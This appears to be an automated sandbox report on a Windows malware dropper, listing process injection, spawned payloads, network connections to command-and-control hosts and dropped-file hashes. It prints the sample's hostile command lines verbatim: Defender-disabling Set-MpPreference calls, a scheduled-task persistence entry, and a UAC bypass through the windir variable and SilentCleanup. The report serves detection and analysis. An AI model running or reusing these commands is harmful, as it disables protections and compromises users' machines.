Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 996 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 996 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 996 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 996 wrote to memory of 3832 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 996 wrote to memory of 3832 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 996 wrote to memory of 3832 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 3832 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 3832 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 3832 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 3832 wrote to memory of 3116 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe
PID 2712 wrote to memory of 1872 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2712 wrote to memory of 1872 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2712 wrote to memory of 1872 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 2712 wrote to memory of 1872 N/A C:\ProgramData\GFDyrtucbvfdg.exe C:\ProgramData\GFDyrtucbvfdg.exe
PID 996 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe
PID 996 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe
PID 996 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe
PID 996 wrote to memory of 1536 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe
PID 3116 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
PID 3116 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
PID 3116 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe C:\Windows\SysWOW64\cmd.exe
PID 2560 wrote to memory of 572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2560 wrote to memory of 572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 2560 wrote to memory of 572 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\taskkill.exe
PID 1536 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\l2uoEMyj2b.exe
PID 1536 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\l2uoEMyj2b.exe
PID 1536 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\l2uoEMyj2b.exe
PID 1536 wrote to memory of 3832 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe
PID 1536 wrote to memory of 3832 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe
PID 1536 wrote to memory of 3832 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe
PID 1536 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe
PID 1536 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe
PID 1536 wrote to memory of 3396 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe
PID 1536 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\9mbL1Q6aMm.exe
PID 1536 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\9mbL1Q6aMm.exe
PID 1536 wrote to memory of 2140 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\9mbL1Q6aMm.exe
PID 1536 wrote to memory of 492 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe
PID 1536 wrote to memory of 492 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe
PID 1536 wrote to memory of 492 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe
PID 1536 wrote to memory of 200 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Windows\SysWOW64\cmd.exe
PID 1536 wrote to memory of 200 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Windows\SysWOW64\cmd.exe
PID 1536 wrote to memory of 200 N/A C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe C:\Windows\SysWOW64\cmd.exe
PID 200 wrote to memory of 3028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 200 wrote to memory of 3028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 200 wrote to memory of 3028 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 492 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe
PID 492 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe
PID 492 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe
PID 492 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe
PID 492 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe
PID 3832 wrote to memory of 424 N/A C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe
PID 3832 wrote to memory of 424 N/A C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe
PID 3832 wrote to memory of 424 N/A C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe
PID 492 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe
PID 3832 wrote to memory of 424 N/A C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe
PID 3832 wrote to memory of 424 N/A C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe
PID 3832 wrote to memory of 424 N/A C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe
PID 3832 wrote to memory of 424 N/A C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe
PID 3832 wrote to memory of 424 N/A C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe
PID 492 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe
PID 492 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe
PID 492 wrote to memory of 1648 N/A C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe
PID 3832 wrote to memory of 3624 N/A C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe C:\Windows\SysWOW64\cmd.exe
PID 3832 wrote to memory of 3624 N/A C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe

"C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe"

C:\ProgramData\GFDyrtucbvfdg.exe

"C:\ProgramData\GFDyrtucbvfdg.exe"

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

"C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe"

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

"C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe"

C:\ProgramData\GFDyrtucbvfdg.exe

"C:\ProgramData\GFDyrtucbvfdg.exe"

C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe

"C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /pid 3116 & erase C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe & RD /S /Q C:\\ProgramData\\706782077957666\\* & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /pid 3116

C:\Users\Admin\AppData\Local\Temp\l2uoEMyj2b.exe

"C:\Users\Admin\AppData\Local\Temp\l2uoEMyj2b.exe"

C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe

"C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe"

C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe

"C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe"

C:\Users\Admin\AppData\Local\Temp\9mbL1Q6aMm.exe

"C:\Users\Admin\AppData\Local\Temp\9mbL1Q6aMm.exe"

C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe

"C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\7fb10b8ea68c1e0064730018fca3cb39.exe"

C:\Windows\SysWOW64\timeout.exe

timeout /T 10 /NOBREAK

C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe

"C:\Users\Admin\AppData\Local\Temp\UhY7FSGD22.exe"

C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe

"C:\Users\Admin\AppData\Local\Temp\KpErZ8LS7h.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Trast.bat" "

C:\Windows\SysWOW64\schtasks.exe

/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat

C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe

"{path}"

C:\Users\Admin\AppData\Local\Temp\9mbL1Q6aMm.exe

"{path}"

C:\Users\Admin\AppData\Local\Temp\eGEyY1HRgn.exe

"{path}"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

\??\c:\windows\SysWOW64\cmstp.exe

"c:\windows\system32\cmstp.exe" /au C:\Windows\temp\knyx0wed.inf

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dCtjCu" /XML "C:\Users\Admin\AppData\Local\Temp\tmpE85D.tmp"

C:\Users\Admin\AppData\Local\Temp\l2uoEMyj2b.exe

"{path}"

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Windows\SysWOW64\DllHost.exe

C:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}

C:\Windows\SysWOW64\reg.exe

reg add hkcu\Environment /v windir /d "cmd /c start /min C:\Users\Public\KDECO.bat reg delete hkcu\Environment /v windir /f && REM "

C:\Windows\SysWOW64\schtasks.exe

schtasks /Run /TN \Microsoft\Windows\DiskCleanup\SilentCleanup /I

C:\Windows\SysWOW64\cmd.exe

cmd /c start C:\Windows\temp\5j402p4w.exe

C:\Windows\temp\5j402p4w.exe

C:\Windows\temp\5j402p4w.exe

C:\Windows\SysWOW64\taskkill.exe

taskkill /IM cmstp.exe /F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"powershell" Get-MpPreference -verbose

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableArchiveScanning $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableBlockAtFirstSeen $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableIOAVProtection $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisablePrivacyMode $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableScriptScanning $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -HighThreatDefaultAction 6 -Force

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -LowThreatDefaultAction 6

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -MAPSReporting 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ModerateThreatDefaultAction 6

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SevereThreatDefaultAction 6

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\nest.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SignatureDisableUpdateOnStartupWithoutEngine $true

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -SubmitSamplesConsent 2

C:\Windows\SysWOW64\reg.exe

reg delete hkcu\Environment /v windir /f

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

C:\Users\Admin\AppData\Roaming\Microsoft\Network\sqlcmd.exe

Network

Country Destination Domain Proto
N/A 8.8.8.8:53 danielmax.ac.ug udp
N/A 8.8.8.8:53 danielmi.ac.ug udp
N/A 185.215.113.77:80 danielmax.ac.ug tcp
N/A 8.8.8.8:53 telete.in udp
N/A 195.201.225.248:443 telete.in tcp
N/A 8.8.8.8:53 danielmi.ac.ug udp
N/A 185.215.113.77:80 danielmi.ac.ug tcp
N/A 5.252.179.21:80 5.252.179.21 tcp
N/A 185.215.113.77:80 danielmi.ac.ug tcp
N/A 8.8.8.8:53 cdn.discordapp.com udp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 162.159.133.233:443 cdn.discordapp.com tcp
N/A 8.8.8.8:53 arsaxa.ac.ug udp
N/A 79.134.225.25:6970 arsaxa.ac.ug tcp
N/A 79.134.225.25:6970 arsaxa.ac.ug tcp
N/A 8.8.8.8:53 icando.ug udp
N/A 8.8.8.8:53 icacxndo.ac.ug udp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 79.134.225.25:6970 arsaxa.ac.ug tcp
N/A 8.8.8.8:53 icando.ug udp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 79.134.225.25:6970 arsaxa.ac.ug tcp
N/A 194.5.98.107:6970 icacxndo.ac.ug tcp
N/A 8.8.8.8:53 icando.ug udp

Files

memory/996-116-0x0000000000650000-0x000000000079A000-memory.dmp

memory/2712-117-0x0000000000000000-mapping.dmp

C:\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

C:\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

memory/3832-121-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

memory/2712-126-0x0000000000440000-0x00000000004EE000-memory.dmp

memory/3832-128-0x0000000000450000-0x000000000059A000-memory.dmp

C:\Users\Admin\AppData\Roaming\DSFnbyhgfrtydfg.exe

MD5 93fffc6736b1dd95a4f4e88734e9d540
SHA1 509a9acffd9b9123fff2a3df9a860b829210f80a
SHA256 80b57df21ba993430e49e63e47f1afd84ac2f64fe50bb0b19413b2f964c42dd0
SHA512 d56d6e46792df1b06449265973e589559ff630ea2bcbcae54ffd0503188477605a63ca4db38f8e5e29d472368902e959f850226cf3ddaa2c0d6ba6ac3b87faed

memory/3116-129-0x0000000000417A8B-mapping.dmp

C:\ProgramData\GFDyrtucbvfdg.exe

MD5 701f6f95d5e205b53b3a74403d46981a
SHA1 3e614af86675b0de761adb5d2fa271bfb3142b95
SHA256 36b216e3219f82031317e03235333638e22d5f93c184e403e2383e322be1e459
SHA512 a7f051d91b24c3a42d81507577f8c9c576f6fd68287a56606f1c0dc7c06c7054d325974b3b176ac019815cce5dbb42ff9104e4d1c7f51fee5f9ee9a420c04d15

memory/1872-131-0x000000000041A684-mapping.dmp

memory/1536-133-0x000000000044003F-mapping.dmp

memory/3832-134-0x00000000005F0000-0x00000000005F8000-memory.dmp

memory/3116-135-0x0000000000400000-0x0000000000434000-memory.dmp

memory/3116-136-0x0000000000460000-0x0000000000461000-memory.dmp

memory/2712-137-0x0000000000440000-0x000000000058A000-memory.dmp

memory/1872-138-0x0000000000400000-0x0000000000420000-memory.dmp

memory/1872-139-0x0000000000430000-0x00000000004DE000-memory.dmp

memory/1536-141-0x00000000001E0000-0x00000000001E1000-memory.dmp

memory/1536-140-0x0000000000400000-0x0000000000495000-memory.dmp

\Users\Admin\AppData\LocalLow\sqlite3.dll

MD5 f964811b68f9f1487c2b41e1aef576ce
SHA1 b423959793f14b1416bc3b7051bed58a1034025f
SHA256 83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7
SHA512 565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

\ProgramData\sqlite3.dll

MD5 e477a96c8f2b18d6b5c27bde49c990bf
